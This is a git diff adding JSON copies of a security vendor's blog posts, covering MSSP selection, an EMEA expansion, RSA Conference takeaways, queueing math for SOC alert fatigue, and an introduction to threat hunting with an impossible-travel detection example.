Why does your MSSP hate you so much that they hand you these tiresome riddles every\u2026 single\u2026 day? Each alert should be a means to an end. Rather than accepting a pile of questions, find a partner that will give you answers. What happened? When? How? What\u2019s the risk? What should you do next? These are the answers you\u2019re paying for, not \u201chey, here\u2019s some alerts.\u201d More important, what is the data telling you over time? Your MSSP should be able to help identify trends and make strategic recommendations that reduce overall risk in your environment. In retrospect, these are the questions you would have asked during the sales process: Can I see a demo of your portal including the technical data and investigative reports I\u2019ll receive? Correct answer: Glad you asked. Here are the answers we\u2019ll give you. How will I know when there\u2019s an incident that matters? How do your analysts investigate them? Correct answer: Click. Look here. You can see exactly what our analysts are doing and why they\u2019re doing it Likely answer: Blah, blah, blah, alert stream, blah, certifications, blah, intelligence, blah, SLA. How do you measure the value you provide? Correct answer: Look at this dashboard. You can see how things are trending and the impact of our recommendations. Likely answer: Alerts detected each month. Warning #4: You\u2019re finding evil days (or weeks) before your MSSP does You found something bad (for the fourth time) days before your MSSP ever told you anything. There could be lots of reasons: they can\u2019t see it, they can\u2019t detect it, their processes are weak\u2026 or maybe their analysts just don\u2019t know much about you and your environment. 
Reducing the time from detection to response is a key metric for measuring risk mitigation in your environment. Context around what the threat is, how it got there, and what it\u2019s doing (or will do) are all critical when responding to attacks. Your MSSP should have the ability to pull alerts from your technologies, apply threat intelligence, and correlate activity across the network, endpoints and your SIEM before they send the activity to an analyst. This ensures they\u2019ll be able to tell the whole story. A good provider will tell you things about your environment \u2014 including your own tools and investments \u2014 that you didn\u2019t already know. In some cases they\u2019ll tell you things that aren\u2019t even related to a security incident. But you\u2019ll still care about them. They might reveal asset misuse or a misconfiguration issue. Either way, fresh eyes should consistently find fresh issues that matter to you. Your MSSP analysts should have close to (if not the same) visibility into your network that you do. That means shared tools and endpoint visibility. Your MSSP will also have a versatile detection engine to make sure they can catch increasingly sophisticated attacks. If you\u2019re being notified late (or never), or getting very little context, it\u2019s time to find alternatives. The answers to these questions will tell you if your team will be better at detecting threats than your MSSP: Can you implement these basic detection use cases that are important to me? Correct answer: Of course, and here\u2019s how we\u2019d do it. Can I see examples of incident notifications? Correct answer: Yes, they include all the context you need to respond to the incident. What data do your MSSP analysts see when they triage an alert? Correct answer: They have host visibility (think EDR) and can connect directly to your security technologies to investigate activity. Warning #5: You\u2019re hiring more people to manage your MSSP You\u2019re starting to dig into the service and you\u2019re getting that nervous feeling. The service looks great, but it\u2019s complicated. And you already know you\u2019re not going to be able to use this thing without help. Never fear! That\u2019s when your MSSP introduces you to their professional services team! They\u2019d be more than happy to sell you expensive people who can help make the thing you bought actually work (services for a service!). Or how about this? You still have a tier-1 analyst team that uses the alerts from the MSSP the same way they\u2019d use alerts from any other product. They get ingested into your SIEM and your team looks at them along with all of the other alerts the MSSP isn\u2019t capable of generating since they can\u2019t support some of the technologies you have. Either way, you\u2019re stuck doing it yourself\u2026 and creating even more work for you and your team. Yes, this actually happens. We know people (you know who you are) in this exact situation. Of course, the goal of any managed solution is to augment your existing capability so you and your team (if you have one) can spend less time fighting fires and more time working on strategic initiatives. When you have to add more firefighters to the team, it\u2019s probably because your MSSP is adding to the fire and not helping put it out. A good provider will reduce the time and money you spend on security operations tasks, not increase it. 
Here\u2019s how to tell if you\u2019re at risk for being on the wrong end of this equation: Include the people on your team who will be working with the service in the tech demo and let them ask questions. Do they feel comfortable using the service to do their jobs? Are they comfortable with the outputs of the service? Sit down with the vendor and map out the workflow between you and your team. How will your team use the service on a daily basis? Is the MSSP adding more steps to your process, or removing them? Does your workflow overlap, or is the MSSP just throwing more alerts over the fence and expecting you to fend for yourself? Go back to your detection uses cases. Did you bring a few that are important to you? If the MSSP can\u2019t implement them then you\u2019re stuck hiring people and purchasing technology that can. \u2014 Remember, your MSSP should help you get more value out of the technologies you\u2019ve already invested in and augment your security team. Above all else, your MSSP should give you answers (not just alerts) so you can improve your security posture in a measurable way. This can only happen if the service is easy to setup, easy to use, and versatile enough to align with your team\u2019s workflow and goals, not the other way around. As you evaluate your options, don\u2019t be afraid to include your team in the conversation. After all, they\u2019re the ones that\u2019ll have to work with the MSSP on a daily basis. Are they excited with what they see? If so, you know it\u2019s because it\u2019ll make their lives easier, not harder. There\u2019s no better litmus test than that." +} \ No newline at end of file diff --git a/watch-out-emea-here-we-come.json b/watch-out-emea-here-we-come.json new file mode 100644 index 0000000000000000000000000000000000000000..e173716a0cb119a06ec3828abcb8f24a444785d0 --- /dev/null +++ b/watch-out-emea-here-we-come.json @@ -0,0 +1,6 @@ +{ + "title": "Watch out EMEA\u2026here we come", + "url": "https://expel.com/blog/watch-out-emea-here-we-come/", + "date": "Oct 18, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Watch out EMEA\u2026here we come Expel insider \u00b7 1 MIN READ \u00b7 CHRIS WAYNFORTH \u00b7 OCT 18, 2022 \u00b7 TAGS: Company news For the past six-plus years, Expel has been a company firmly rooted in North America. It\u2019s where a lot of our customers are, it\u2019s where our people are, and it\u2019s where we are making big strides in changing the cybersecurity landscape for the better\u2014all to provide our customers with security that makes sense. Today we\u2019re excited to announce that we\u2019re expanding \u201cacross the pond\u201d and setting up shop in EMEA (the United Kingdom, Ireland, the Netherlands, and Sweden to be exact). Why are we making this move? Common cyber threats, like business email compromise (BEC), business application compromise (BAC), phishing, ransomware, cryptojacking, and more, impact companies globally. Our approach, centered around our combination of people, processes, and technology, can deliver the same positive cybersecurity outcomes to companies in these places that we\u2019ve experienced at home. We at Expel have proven that we can be effective in helping our customers mitigate these threats, and do so quickly, often hand-in-hand with our customers\u2019 security teams. 
Plus, the collaborative experience in the Expel Workbench\u2122 platform gives customers freedom in how they manage their security operations \u2014 whether that\u2019s following along with live investigations, or receiving alerts at every step from when an investigation starts until it\u2019s done. This transparency means customers always know what\u2019s happening, and is a core value at Expel. We\u2019re fortunate to have a few EMEA-based customers already, so we\u2019ve laid the groundwork for our approach in the region. We\u2019re also employing a channel-first sales model that leverages resellers\u2019 regional and industry-specific expertise. To meet the needs of our growing customer base, we\u2019re building out our team. In fact, I\u2019m Expel\u2019s first Europe-based employee! You can read more about me and Expel in general here , if you\u2019re interested! (BTW, we\u2019re hiring ). We\u2019re really thrilled to be expanding Expel into EMEA as the first step in our international journey. Keep an eye on our blog as we continue to share more information about our expansion into EMEA (and beyond)!" +} \ No newline at end of file diff --git a/we-re-definitely-stronger-together-top-3-takeaways-from.json b/we-re-definitely-stronger-together-top-3-takeaways-from.json new file mode 100644 index 0000000000000000000000000000000000000000..77e245617db85819b5dfc00beb70ea668b3b5ec3 --- /dev/null +++ b/we-re-definitely-stronger-together-top-3-takeaways-from.json @@ -0,0 +1,6 @@ +{ + "title": "We're definitely stronger together: top 3 takeaways from ...", + "url": "https://expel.com/blog/were-definitely-stronger-together-top-3-takeaways-rsa-conference-2023/", + "date": "May 5, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG We\u2019re definitely stronger together: top 3 takeaways from RSA Conference 2023 Expel insider \u00b7 3 MIN READ \u00b7 KELLY FIEDLER \u00b7 MAY 5, 2023 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools We\u2019re still whirling from our second year on the show floor at RSA Conference (RSAC) 2023! It was a week well-spent, full of interesting sessions, meaningful connections, and a whole lot of fun. The conference buzzed with pre-pandemic levels of excitement as we maneuvered through Moscone\u2014chatting with friends and swapping tales from the security operations center (SOC) on the latest cybersecurity threats and trends. Our team at the booth stayed busy from opening to closing announcements each day, giving demos, talking shop, and showing an approach to security that can actually be delightful. Also, local artist Bee Betwee joined us to create an art installation highlighting the many faces, backgrounds, and experiences that represent cybersecurity, a tangible ode to this year\u2019s theme of \u201cStronger Together.\u201d Now that the dust has settled and we\u2019ve had some time to reflect, here are our top takeaways from the show. There are lessons for defenders in the most unexpected places. The most surprising thing from this year\u2019s conference? How star-studded an affair it really was! From Saturday Night Live legend Fred Armisen, to Monty Python\u2019s Eric Idle, country music sensation Chris Stapleton, and famed physicist Michio Kaku (to name a few), it was hard not to be a little star-struck at this year\u2019s conference. But even if their sessions weren\u2019t exclusively about security, the undercurrent of community and collaboration was ever-present. 
RSAC is about the fellowship among defenders, as we\u2019re all tasked with the same challenge. Our adversaries are just as creative, smart, and well-resourced as we are, so our best advantage is to band together in fighting the good fight. (Who knew how much we needed a rendition of The Beatles\u2019, \u201cAll You Need Is Love,\u201d led by Fred Armisen, to remind us?) Generative AI is here to stay, and it\u2019s up to us to use it wisely. The promise of generative artificial intelligence (AI) represents as great an opportunity as it does a responsibility. It has the potential to change lives\u2014from relieving burnout by handling tedious tasks, to the effect it can have on the cybersecurity skills gap in both training and breaking down barriers for equity and inclusivity. The onus is on us, the defender community, to make a conscious effort to encourage mindful use of these tools to ensure they\u2019re fed with a diversity of thought and experiences. Our concern shouldn\u2019t be about what AI can do on its own, but what people can accomplish when we harness this technology correctly. Security-specific AI requires the combination of AI, hyperscale data, and threat intelligence, balanced with people as the important decision makers. This is a balance we\u2019ve believed in\u2014and done, with our friendly detection and response bots, Josie\u2122 and Ruxie\u2122\u2014since our inception, as our founders started Expel with a technology-forward approach. At the end of the day, we\u2019re solving people problems. From the talent gap, to the challenges and excitement presented by AI, to \u200c cybercriminals themselves, the common challenge is clear: we face a people problem. Whether talking about the White House security or the World Cup, the core takeaway was that the only way forward in the cybersecurity battle is to face it together. Another one of these \u201cpeople problems\u201d we talk about a lot is burnout\u2014it\u2019s an industry buzzword for a reason. Analysts drown in reams of alerts daily, and it\u2019s no secret that, without the right tech in place, the triage is tedious. So how can we do high-quality work without making our people miserable? From the jump, we\u2019ve believed the key to solving this people problem boils down to resourcing\u2014finding the right combination of skilled analysts and advanced automation that lets each do what they do best. Throughout the week, one thing was evident: it\u2019s going to take a village. The \u201cStronger Together\u201d theme really resonated with us at Expel because we\u2019ve always believed in collaboration and information sharing amongst the defender community to make us better as a whole. It\u2019s the reason we continue to share trends and recommendations from our SOC with our quarterly and annual threat reports, and why we keep it real here on our blog. We\u2019re also continuing to expand our solutions portfolio to keep pace with cybercriminals. At RSAC, we announced Expel Vulnerability Prioritization , a new solution that highlights which vulnerabilities pose the greatest risk, so organizations can take immediate, informed action. We\u2019re just getting started this year, and we can\u2019t wait to keep up the momentum. If you want to keep the conversation going, drop us a line anytime. And if you\u2019re interested in seeing our security operations platform, Expel Workbench\u2122, in action, you can sign up for a free 14-day trial of Expel MDR for Cloud Infrastructure here ." 
+} \ No newline at end of file diff --git a/what-i-love-lucy-teaches-us-about-soc-performance.json b/what-i-love-lucy-teaches-us-about-soc-performance.json new file mode 100644 index 0000000000000000000000000000000000000000..412ca3db80f47b87a545457e4c47df1fb560b935 --- /dev/null +++ b/what-i-love-lucy-teaches-us-about-soc-performance.json @@ -0,0 +1,6 @@ +{ + "title": "What \"I Love Lucy\" teaches us about SOC performance", + "url": "https://expel.com/blog/what-i-love-lucy-teaches-us-about-soc-performance/", + "date": "Mar 14, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG What \u201cI Love Lucy\u201d teaches us about SOC performance Security operations \u00b7 8 MIN READ \u00b7 MATT PETERS \u00b7 MAR 14, 2018 \u00b7 TAGS: Get technical / How to / SOC In September 1952, \u201cI Love Lucy\u2019s\u201d Lucy and Ethel decided to go to work in a candy factory. They were placed on an assembly line and told to individually wrap chocolates as they passed by . \u201cIf any of these end up in the packing room unwrapped, you\u2019ll both be fired,\u201d the supervisor said. The situation was fraught, and hijinks ensued. By the time cameras stopped rolling, Lucy and Ethel had fallen behind. Unwrapped candy was flowing into the packing room and both women had resorted to eating chocolates to try to stanch the flow. Back in the 1950s, this account of an overloaded system was \u201ccomedy gold.\u201d But you\u2019re probably wondering what any of this has to do with information security. Well, we see this type of thing pretty regularly in the security world. It\u2019s usually called \u201calert fatigue\u201d and it\u2019s not nearly as funny. Whether it\u2019s chocolate or alerts, fundamentally we\u2019re talking about the same problem: we\u2019re underwater, we\u2019ve started resorting to a ton of things we know aren\u2019t the right solution just to keep up and yet we\u2019re still underwater. When confronted with this situation, CISOs (or chocolate-factory owners) need to make some decisions about how to get out of trouble. It\u2019d be a mistake, however, to just start making changes. It\u2019s best to make sure that you understand the system first. The system Using broad brush strokes, all systems that process work items (or jobs) can be boiled down to three basic elements: jobs, processors and buffers. Jobs are the work items that flow through the system and get processed. Lucy and Ethel had chocolates, the security world has alerts, incidents, engagements and the like. Processors are the things that \u201cdo\u201d the work. These are people and machines who take one thing and turn it into something else. This definition includes everything from Lucy and Ethel, who process chocolates by wrapping them, to your SIEM that takes a bunch of log data and correlates it together as a single security alert. Buffers are components that allow a looser coupling between one processor and another. They primarily function during burst demand to keep the system from collapsing. There are three primary types of buffers: Capacity: You can add more people/processors to your production system. This is what happens when your grocery store adds more checkout people during a rush. Inventory: You can store up work to do later when a processor is idle. Anytime you see a warehouse or a table of parts in a workshop, you\u2019re looking at a buffer. Security teams, sadly, do not benefit from these \u2013 inventory does not exist in the security world. Time: You can take longer to produce something. Ever been to the DMV? 
If so, you\u2019ve experienced a time-based buffer. The three elements of systems Okay, I\u2019m going to warn you that this is where things get a little nerdy (and a little math-y). If you thought it was nerdy before, then well \u2026 brace! But rest assured the math will lead us to a place of better understanding. Here goes. Every production system involves some configuration of the three elements above, organized to optimize for some outcome. For example, if chocolate arrives on the conveyor belt at an average rate \u03bb, and Lucy and Ethel can each wrap chocolates on average, we can show the chocolate factory schematically like this: If chocolate arrives on the conveyor belt at an average rate that equals the average processing rate, then everything will be ducky, right? Wrong! And this is where things begin to go off the rails for our heroines, and many times, for hapless security operations teams. Variation: the source of security operations potholes If you watch the video closely you may notice that Lucy and Ethel were doing OK for the first little bit. Then Lucy misses a step and starts to stumble. From this point on, they\u2019re doomed 1 . The issue here is variation. If a job takes too long, then the next one gets started late, and the next one, and so on \u2013 the system will never catch up. In the real world, processors aren\u2019t perfect: a chocolate is hard to pick up, alerts turn into investigations, attackers get creative \u2013 variation is in everything. And when quality begins to slip, this problem can compound \u2013 unwrapped chocolates may be returned for re-work, increasing the input rate and causing the problem to get worse. With this in mind, we\u2019re better off viewing the chocolate factory more like this: Chocolate is still arriving at an average rate of \u03bb, and being serviced at an average rate of , but now there\u2019s variation in these rates (as indicated by standard deviation or \ud835\udf0e).This variation is the root of many a smoking crater in the security operation center (SOC). Waltz or hip hop in the SOC? The intricate dance between variation and utilization. In the event of a big burst of inbound work like Valentine\u2019s Day at the flower shop (or a new signature set from an IDS vendor), most production managers will ask the team to \u201cdig deep\u201d and work a little harder to clear the backlog. In more formal terms, the manager is increasing utilization, which may increase throughput. What\u2019s not entirely obvious, though, is that this also makes the system more fragile. Why? You guessed it \u2026 variation. In SOC operations, alert processing time is often a big concern. Attackers are on the move and people want to know \u201chow long will it take us to go from a signal to a reaction?\u201d To see how the relationship between variance and utilization impacts alert processing time, it\u2019s helpful to express the relationship mathematically (in this case with the Kingman approximation 2 ). In case math isn\u2019t your thing, what this equation says is that the estimated service time is related to the variance in the arrival and service times (V or ), the utilization of the processor (U or ) and the average service time \u03bc s . Let\u2019s make a few assumptions to turn this equation into a real example: Alerts arrive, on average, every 10 minutes. 
The standard deviation is three minutes, so On average, it takes you two minutes to triage them, with a standard deviation of four minutes (they vary wildly), so Your utilization is 70 percent, so Based on those assumptions, the equation tells us that the average alert wait time will be: In case deciphering equations isn\u2019t your thing, what this means is that it will take about 9.47 minutes before an alert gets reviewed in this system. This is a little tight, but probably alright since the alerts are only arriving every 10 minutes on average . As the variance in our process increases, the alert wait time will increase. This makes sense since our analysts will be spending more time on some of the alerts, which forces newer alerts to wait longer. This is compounded by utilization. If we, like Lucy and Ethel, are already at 90 percent capacity and a single variation happens, it can knock us off our game. The chart below shows the effects of increasing variation at two different utilizations: 70 and 90 percent. The wait time in the process with 90 percent utilization increases much faster than when there is a buffer to absorb it. There are a few interesting things about this relationship, which can help us plan better: The average service time is one of three factors that contribute to service time. Making each member of your team faster is not the only thing in play. The utilization term tells us that operating a SOC team (aka a processor) at close to full capacity will magnify any variance in the system. If Lucy had time to correct her first mistake, the episode would have been less funny because she would have had some buffer to recover. The inclusion of variance as a term is a bit more abstract. In a toll booth you separate out the people with E-ZPass/FasTrak and the people who pay with bills so you don\u2019t stick a bunch of fast people behind someone paying with change they\u2019re still digging out of their seat cushions. Perhaps the most important thing this equation tells us is that these quantities are multiplicatively related \u2013 small changes in variance in a system that is already at 90 percent utilization will be catastrophic to service time. Similarly, small changes in utilization have the potential to move the needle quite a bit. That\u2019s enough math. What does it mean for my SOC? Let\u2019s say you\u2019re a CISO with a team of three that\u2019s buried in 200,000 alerts a day. What should you do? And how does any of this help? Good question, here\u2019s a rough schematic to use as a strawman: Given this diagram, let\u2019s look at the knobs we can turn: Inventory buffers : While our SIEM is useful to provide a little rate-decoupling, it\u2019s not really an option to store the alerts and work them next week \u2013 the attacker won\u2019t wait on us. Quality : We can\u2019t reduce the quality of our work to speed it up. We\u2019d miss things and that would be bad\u2122. We\u2019re not without hope though, there are still some dials we can turn: Dial #1: Tune your devices (arrival rate) It goes without saying that if the average arrival rate exceeds the average service time, you\u2019re hosed. As we learned above, if the average arrival rate equals the average service time, then the system is iffy at best. Tuning your devices is the number one way to adjust arrival rate. SIEM and IDS technologies are legendary for the \u2018firehose of alerts\u2019 problem. 
Investing time in filtering and tuning these, or investing in technology with a higher signal-to-noise ratio is probably the number one thing you can do. Guard against purchasing additional gear without tuning existing devices \u2014 new signal compounds the problem. Dial #2: Increase alert triage efficiency (service rate) The time it takes to process an alert is: Measuring these times, or at least having a rough idea of how long they take is instructive: If 99 percent of all alerts are closed out during triage, then investment there will have the biggest bang. Automating alert enrichment and providing context will speed up triage, while training your SOC analysts can boost capacity so each analyst can handle more alerts. To decrease the time to investigate, endpoint detection and response (EDR) or network forensic tools are your first stop. Many shops skimp here, and that may be a mistake. If one investigation takes eight hours because it has to be done manually it can easily swamp a small team. An EDR tool could reduce investigative time to an hour or less. Dial #3: Hire more analysts (capacity) If, after optimizing the time it takes to triage a single alert, your service rate is still lower than your arrival rate, you\u2019ve got to add capacity. That means hiring analysts. This can be an expensive proposition , though there are alternatives . Dial #4: Variance (aka the unexpected) As the Kingman equation shows us, the variance that\u2019s so pervasive in security operations can uncork an otherwise well-regulated system. There are two components to this: Arrival rate \u2013 if your team comes in every morning to a flurry of new work, consider staffing a night shift. This can keep the work from building up and smooth out the workflow. Outside of that, there\u2019s really not much you can do to adjust this variance. Service Rate \u2013 there are two things that can help here: automation and training. Experience tells us that training should almost always be our first stop \u2013 in the world of cheap python scripts and API-driven applications, human variance is by far the more pernicious of the two. Conclusion Alert fatigue in a SOC is a real problem and one that just about every organization has to deal with. It\u2019s such a problem that \u2013 for better or worse \u2013 there\u2019s an entire SOC role whose sole job is to help cope with it. The problem that many organizations encounter when they try to address alert fatigue is that they don\u2019t take the time to understand the system that they\u2019re trying to change. Instead, they just start making changes. Lots of times those changes include tweaks to their processes intended to achieve admirable-sounding outcomes like \u201creduce the time it takes to investigate a security incident.\u201d But if you don\u2019t take the time to understand the system, you can get some undesirable outcomes. For example, you might reduce the time it takes to investigate a security incident only to find that you\u2019ve unwittingly changed your system in such a way that you\u2019re now missing actual security incidents. If you\u2019re a fire chief, it doesn\u2019t make a lot of sense to put Ferrari engines in fire trucks so you can get to the fires faster. So, before you implement your SOC metrics program , before you start tweaking your SOC processes and before you start making staffing adjustments, take the time to understand the system that you\u2019re operating so you know how changes to that system will impact its operation. 
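For reference, the queueing result this post leans on is the Kingman (G/G/1) approximation. Written in standard textbook notation, which may differ slightly from the symbols used in the post's figures, with rho the utilization, c_a and c_s the coefficients of variation of inter-arrival and service times, and tau_s (the post's mu_s) the average service time:

```latex
% Kingman (G/G/1) approximation: wait time = utilization term x variation term x avg. service time
\mathbb{E}[W_q] \;\approx\;
  \underbrace{\frac{\rho}{1-\rho}}_{U}\,
  \underbrace{\frac{c_a^{2}+c_s^{2}}{2}}_{V}\,
  \underbrace{\tau_s}_{\mu_s\ \text{(avg. service time)}}

% Worked with the example numbers above:
\frac{0.7}{1-0.7}\cdot\frac{(3/10)^{2}+(4/2)^{2}}{2}\cdot 2\ \text{min}
\;\approx\; 9.5\ \text{min}
```

Plugging in the example assumptions (70 percent utilization, a 3-minute standard deviation on 10-minute arrivals, and a 4-minute standard deviation on 2-minute triage) gives an expected wait in the neighborhood of nine and a half minutes, in line with the figure quoted earlier.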
After all, there\u2019s only so much chocolate that two people can stomach if the system goes off the rails. ___________ 1 It does not help that the assembly line actually sped up during the scene, but the result would have been the same at a constant rate. 2 For the sake of simplicity, we\u2019re modeling the single processor case. In normal SOC operations, you\u2019d use the G/G/c form of this." +} \ No newline at end of file diff --git a/what-is-cyber-threat-hunting-and-where-do-you-start.json b/what-is-cyber-threat-hunting-and-where-do-you-start.json new file mode 100644 index 0000000000000000000000000000000000000000..a30d30cf2b7c0e879a7e2d9b5f8cf76566547e07 --- /dev/null +++ b/what-is-cyber-threat-hunting-and-where-do-you-start.json @@ -0,0 +1,6 @@ +{ + "title": "What is (cyber) threat hunting and where do you start?", + "url": "https://expel.com/blog/what-is-cyber-threat-hunting-and-where-do-you-start/", + "date": "Apr 9, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG What is (cyber) threat hunting and where do you start? Security operations \u00b7 5 MIN READ \u00b7 JEN BIELSKI \u00b7 APR 9, 2018 \u00b7 TAGS: Example / Hunting / Mission / Overview Sometimes the security landscape seems like a big game of telephone. A buzzword pops up. It may even be a good one. But then it enters the vendor echo chamber. Everyone starts repeating it to each other. The vendors CEO says \u201cWe\u2019ve got to put that on our website.\u201d The sales VP says \u201cWe\u2019ve got to put that on our tradeshow booth.\u201d And before long everyone in infosec is sayin\u2019 it but nobody really knows what it means. Usually it\u2019s defined as whatever the definer is doing. It\u2019s kinda funny. But it\u2019s really not. Because if you\u2019re charged with making your organization more secure you\u2019re left wondering what\u2019s real(ly important) and whether you should care. The term \u201chunting\u201d is a good example. It has been kicking around for almost seven years since it was first introduced in 2011 . The fact that it\u2019s had more time to marinate than some of the newer buzzwords may be why it\u2019s so confusing. Whatever the reason, at Expel we want to demystify what hunting is and what it\u2019s not. So here goes nothin\u2019. What is hunting? In short, hunting is a proactive effort that applies a hypothesis to discover suspicious activity that may have slipped by your security devices. Now, that doesn\u2019t mean you can\u2019t use your security tools to go hunting (we\u2019ll get to that in a bit). But looking at alerts coming from your endpoint detection and response (EDR) tool isn\u2019t hunting. It\u2019s alert management. And pretty much anything on this list also isn\u2019t hunting. Comparison of hunting vs. alert management Here\u2019s another way to think about it. With hunting you\u2019re assuming that something has already failed and you\u2019ve been compromised. The attacker has gotten past the perimeter (aka inside the network) and you\u2019re looking for them. Since you don\u2019t know where the attacker is hiding or who they\u2019re trying to impersonate you\u2019ll need to start with a theory based on common tactics attackers use. Then, once you know how you plan to seek out the attacker you\u2019ll need to look to take a closer look to identify activity that looks a little off. Things that don\u2019t look normal become investigative leads for an analyst to further review. 
Hunting process overview Example: Finding stolen user credentials (aka \u201cYou can\u2019t travel that fast!\u201d) Attackers use lots of different methods to steal user credentials so they can blend in with normal activity and avoid suspicion. But when attackers use those stolen credentials to access a system their location is usually drastically different from the user\u2019s real location. For example, an attacker in New York could login with stolen credentials and \u2026 thirty minutes later the real user could login in Los Angeles. Planes just don\u2019t fly that fast (not to mention TSA). By reviewing the location of successful user logins, you can identify login activity that is too geographically disparate to represent legitimate user travel. Here\u2019s what that would look like if we applied the process we outlined above. Hunting technique example: finding compromised accounts using login geo-infeasibility What do you need to start hunting (the basics) Now that we\u2019ve talked about what hunting is, let\u2019s identify the basic tools you\u2019ll need to hunt. Here\u2019s your shopping list starting from the hardest to find, to the easiest. 1. Someone (or some people) to do the hunting: That\u2019s right. Hunting requires humans. Or at least human judgment to evaluate the data you collect. If you\u2019re lucky, you may already have someone to perform this task. But if you\u2019re smaller, or your security program is still maturing you\u2019ll have to go hunting (heh) for someone. And that can be tough . Good threat hunters have typically done a stint on an incident response team, they\u2019re itching to do some forensics and they\u2019ve probably reversed at least one piece of malware just for fun. To translate, they\u2019re not cheap, or easy to find. And once you find them you need to keep them (which can be easier said than done ). Of course, if you decide you don\u2019t want to or can\u2019t find your own hunters, there\u2019s a line of security vendors and managed detection and response (MDR) providers that would love to help you. 2. Security device to collect data: Once you\u2019ve sorted out the pesky people problem, your next task will be to feed them some data. For that, you\u2019ll need security devices. Endpoint detection and response (EDR) tools are a good place to start, but they\u2019re not the be-all-end-all. Endpoints are a source of the truth, but your firewalls, SIEM or network forensics tool also collect data with crucial details for identifying malicious activity and filling out the story. The more data you can collect, the more you can hunt for. But don\u2019t get hung up on the tools. At a minimum, if you\u2019ve got either an endpoint or a network tool you\u2019ve got what you need to get started. 3. A list of things to hunt for: Finally, you\u2019ll need to decide what you want to hunt for. Knowing the tactic you want to sleuth out will guide the data you\u2019ll need to collect and what outliers to look for. The MITRE ATT&CK framework is a good starting point. In fact, it\u2019s what we use here at Expel. It outlines the tactics and techniques attackers commonly use at each stage of the attack lifecycle. As you consider what you want to hunt for you\u2019ll have to make sure that you have tools that can feed you the specific type of data you need. And be realistic about how much time you have. 
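To make the geo-infeasibility technique above concrete, here is a minimal sketch in Python. The input fields, the sample coordinates, and the 500 mph plausibility threshold are illustrative assumptions, not a production detection.

```python
# "Impossible travel" hunt sketch: flag consecutive successful logins for the
# same user whose implied travel speed is not physically plausible.
from dataclasses import dataclass
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

MAX_PLAUSIBLE_MPH = 500.0  # roughly commercial airline speed


@dataclass
class Login:
    user: str
    when: datetime
    lat: float
    lon: float


def miles_between(a: Login, b: Login) -> float:
    # Haversine great-circle distance in miles.
    dlat, dlon = radians(b.lat - a.lat), radians(b.lon - a.lon)
    h = sin(dlat / 2) ** 2 + cos(radians(a.lat)) * cos(radians(b.lat)) * sin(dlon / 2) ** 2
    return 3959.0 * 2 * asin(sqrt(h))


def infeasible_pairs(logins: list[Login]):
    logins = sorted(logins, key=lambda l: (l.user, l.when))
    for prev, cur in zip(logins, logins[1:]):
        if prev.user != cur.user:
            continue
        hours = (cur.when - prev.when).total_seconds() / 3600.0
        if hours > 0 and miles_between(prev, cur) / hours > MAX_PLAUSIBLE_MPH:
            yield prev, cur  # investigative lead for an analyst


if __name__ == "__main__":
    leads = infeasible_pairs([
        Login("alice", datetime(2018, 4, 9, 12, 0), 40.71, -74.00),    # New York
        Login("alice", datetime(2018, 4, 9, 12, 30), 34.05, -118.24),  # Los Angeles
    ])
    for a, b in leads:
        minutes = (b.when - a.when).total_seconds() / 60
        print(f"{a.user}: {miles_between(a, b):.0f} miles in {minutes:.0f} minutes is not plausible travel")
```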
If you choose to outsource your hunting capability, make sure you ask your service provider to explain how they\u2019ll be hunting and how their techniques align with the security tools you\u2019ve got. If their answers are squishy, it\u2019s time to move on. Is hunting right for your organization? Now that we\u2019ve (hopefully) taken some of the mystery out of hunting you may be wondering if it\u2019s something that should even be on your radar. While it does provide an extra level of security, it\u2019s not practical for every organization to implement a hunting program. We recommend evaluating your risks and resources to determine if you should develop a hunting program. If you operate in a high-risk (and highly targeted) environment \u2013 think banks, defense contractors and companies that store large amounts of personal and financial information \u2013 then hunting probably makes sense because there are lots of adversaries trying to infiltrate your network. But if your organization\u2019s risk profile is medium- to low-risk, you\u2019re likely the target of commodity malware and should evaluate where your resources are most needed. In that case, hunting can take up a lot of time and distract you from things that should probably be much higher on the priority list like effective anti-phishing controls, asset management, third-party assessments and a myriad of other things that make up an effective cyber risk program. Doing security right is difficult, and focusing on hunting when you should be focusing on building a more secure foundation can actually make you less secure. Either way, you should make a conscious decision about whether you\u2019re hunting or not. Don\u2019t accidentally start hunting because your staff started chasing shiny things and found themselves looking at suspicious activity all over your network. That said, if you decide a formal hunting program makes sense here are two good places to start. 1 \u201cCredential access\u201d. MITRE tactic description, https://attack.mitre.org/wiki/Credential_Access 2 \u201cLateral movement\u201d. MITRE tactic description, https://attack.mitre.org/wiki/Lateral_Movement 3 \u201cExecution\u201d. MITRE tactic description, https://attack.mitre.org/wiki/Execution" +} \ No newline at end of file diff --git a/what-is-windows-defender-atp-is-it-any-good-expel-io.json b/what-is-windows-defender-atp-is-it-any-good-expel-io.json new file mode 100644 index 0000000000000000000000000000000000000000..4ea46d0fbbb7b602faa195364edbbad4b40d75d8 --- /dev/null +++ b/what-is-windows-defender-atp-is-it-any-good-expel-io.json @@ -0,0 +1,6 @@ +{ + "title": "What is Windows Defender ATP & Is It Any Good? - Expel.io", + "url": "https://expel.com/blog/windows-defender-atp-our-two-cents/", + "date": "Sep 1, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Is Microsoft Defender for Endpoint good? Security operations \u00b7 8 MIN READ \u00b7 TYLER FORNES AND MYLES SATTERFIELD \u00b7 SEP 1, 2020 \u00b7 TAGS: Alert / EDR / Get technical / Managed detection and response / SIEM It\u2019s no secret that the industry has eyes for Defender for Endpoint. After a few months of using and integrating it with our platform, we feel the same. In a few other posts, we\u2019ve shared our thought process on how we think about security operations at scale and the decision support we provide our analysts through our robots. 
